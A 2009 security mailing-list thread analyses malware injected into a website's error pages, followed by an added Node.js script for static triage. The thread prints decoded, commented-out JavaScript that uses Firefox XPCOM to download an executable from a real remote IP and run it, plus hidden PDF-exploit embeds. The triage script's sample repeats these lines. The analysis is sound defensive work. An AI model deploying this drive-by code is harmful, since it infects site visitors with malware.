Nice, bad code is actually on all of the error (404) pages for the site as well as some other PHP pages. The code is actually a base64 obfuscation technique to hide the actual attack code. Once decoded, the code attempts multiple attacks to try and get the victim to download an executable:

hxxp://77.92.158.122/webmail/inc/web/load.php

VirusTotal results (3/40): http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3

Also this code appears to be trying to exploit specific browser types (Chrome and Mozilla in particular), as can be seen from this code snippet of the decode. (Commented out each line just in case someone has a browser that will try and render this.)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, "Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var file=C.classes['@ mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initWithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@ mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); }")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ io=C.classes['@ mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=io.newURI('http://77.92.158.122/webmail/inc/web/load.php','UTF8',null);persist=C.classes['@ mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createInstance(C.interfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")();

Also attempts to download a hostile PDF file from a subdirectory underneath this one, which was created with a demo copy of Foxit.

hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO: Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code. I can upload or update this thread if you are interested in the other attacks.

Jake

On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills <securinate@gmail.com> wrote:
You beat me to it.
-ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster@gmail.com> wrote:
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate@gmail.com> wrote:
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54
That javascript writes this to the page (URL obscured):

document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
The 1.2.3.4 in the URL is my public IP address (I changed that).
Below the javascript, it grabs a PDF:

<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
That PDF is on the site, I haven't looked at it yet though.
Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
Yes, definitely malicious:
http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
- ferg
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
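Editor's added example, not code from anyone in the thread: a small Node.js triage script for the kind of injected page described above. It peels eval(atob(...)) layers off a captured 404 page, then pulls URLs, <embed> sources and behavioural indicators (hidden or PDF embeds, a -moz-binding to a chrome:// XBL file, XPCOM file/process/persist calls) out of every layer, without ever executing the script. The sample page is constructed here: the second stage is modelled on the decoded payload quoted in the thread (the 77.92.158.122 URLs are the ones the thread reports, 1.2.3.4 is the poster's placeholder), and the base64 wrapper is generated at runtime so it is guaranteed to decode. The rule names and the two-flag "malicious" threshold are my own choices, not anything from the thread.

```javascript
// Added example (not from any message in this thread): static triage of an
// injected script of the kind the thread describes. Node.js only; nothing from
// the sample is executed.

// --- Constructed sample input -----------------------------------------------
// Second stage modelled on the decoded payload quoted in the thread (the
// 77.92.158.122 URLs are the ones the thread reports; 1.2.3.4 is the poster's
// placeholder for the victim IP). This is not a capture.
const STAGE2 = [
  'document.write("<embed src=\\"http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\\" width=\\"0\\" height=\\"0\\" type=\\"application/pdf\\"></embed>");',
  'var el = document.createElement("div");',
  "el.setAttribute(\"style\", \"display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');\");",
  "var file = C.classes['@mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile);",
  "var proc = C.classes['@mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess);",
  "source = io.newURI('http://77.92.158.122/webmail/inc/web/load.php', 'UTF8', null);",
  'persist.saveURI(source, null, null, null, null, file);',
].join('\n');

// First stage: the base64 wrapper as it would sit in a 404 page. Encoded at
// runtime so the sample is guaranteed to decode to STAGE2.
const SAMPLE_404_PAGE =
  '<html><body><h1>404 Not Found</h1>\n<script>eval(atob("' +
  Buffer.from(STAGE2, 'utf8').toString('base64') +
  '"));</script>\n<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>\n</body></html>';

// --- Decoder -----------------------------------------------------------------
// One atob("...") literal per layer covers the pattern in the thread; maxDepth
// guards against a payload that keeps unwrapping forever.
const ATOB_RE = /atob\s*\(\s*(["'])([A-Za-z0-9+\/=\s]+)\1\s*\)/;

function decodeLayers(text, maxDepth = 5) {
  const layers = [text];
  let current = text;
  for (let depth = 0; depth < maxDepth; depth++) {
    const m = ATOB_RE.exec(current);
    if (!m) break;
    const decoded = Buffer.from(m[2].replace(/\s+/g, ''), 'base64').toString('utf8');
    if (!decoded) break;
    layers.push(decoded);
    current = decoded;
  }
  return layers;
}

// --- Indicators ---------------------------------------------------------------
const URL_RE = /https?:\/\/[^\s"'<>\\]+/g;
// src= inside <embed>, tolerating the backslash-escaped quotes of a
// document.write() string literal.
const EMBED_SRC_RE = /<embed[^>]*?src=\\?["']([^"'\\]+)/gi;

// Rule name -> pattern (names are this example's own). XPCOM contract IDs allow
// an optional space after "@" because mail software sometimes inserts one.
const RULES = [
  ['obfuscation:eval-atob', /eval\s*\(\s*atob\s*\(/],
  ['hidden-embed', /<embed[^>]*(?:width|height)=\\?["']?0\\?["']?/i],
  ['pdf-embed', /<embed[^>]*type=\\?["']?application\/pdf/i],
  ['xbl-chrome-binding', /-moz-binding\s*:\s*url\(\s*["']?chrome:\/\//i],
  ['xpcom:file-write', /@\s?mozilla\.org\/file\/local;1|nsILocalFile/],
  ['xpcom:process-launch', /@\s?mozilla\.org\/process\/util;1|nsIProcess/],
  ['xpcom:fetch-and-save', /nsWebBrowserPersist|nsIWebBrowserPersist|\.saveURI\s*\(/],
];

// http -> hxxp so the report can be pasted into a thread like this one.
const defang = (u) => u.replace(/^https?/i, (s) => s.replace(/tt/i, 'xx'));

function triage(pageText) {
  const layers = decodeLayers(pageText);
  const urls = new Set(), embeds = new Set(), flags = new Set();
  for (const text of layers) {
    for (const u of text.match(URL_RE) || []) urls.add(defang(u));
    for (const m of text.matchAll(EMBED_SRC_RE)) embeds.add(defang(m[1]));
    for (const [name, re] of RULES) if (re.test(text)) flags.add(name);
  }
  // Threshold is a judgement call for this example: one hit (e.g. a lone
  // hidden embed) is worth a look, two or more is a verdict.
  const verdict = flags.size >= 2 ? 'malicious' : flags.size === 1 ? 'suspicious' : 'clean';
  return { layers: layers.length, urls: [...urls].sort(), embeds: [...embeds].sort(), flags: [...flags].sort(), verdict };
}

console.log(JSON.stringify(triage(SAMPLE_404_PAGE), null, 2));
```

Run it with `node triage.js` (any filename) or feed it a saved copy of a suspect page via `triage(fs.readFileSync(path, 'utf8'))`. The point of peeling every layer before matching is that the URLs and XPCOM calls that matter here only exist in the decoded stage, so a scanner that looks at the raw 404 page sees nothing but an innocuous-looking base64 blob.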